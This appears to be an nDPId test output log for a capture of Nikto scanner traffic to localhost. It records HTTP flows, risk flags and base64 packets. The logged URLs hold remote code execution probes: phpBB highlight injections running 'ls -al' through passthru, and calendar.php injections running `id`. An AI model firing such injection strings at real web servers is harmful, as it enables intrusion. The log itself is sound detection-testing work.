00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="}
01204{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01204{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="}
01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"}
01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="}
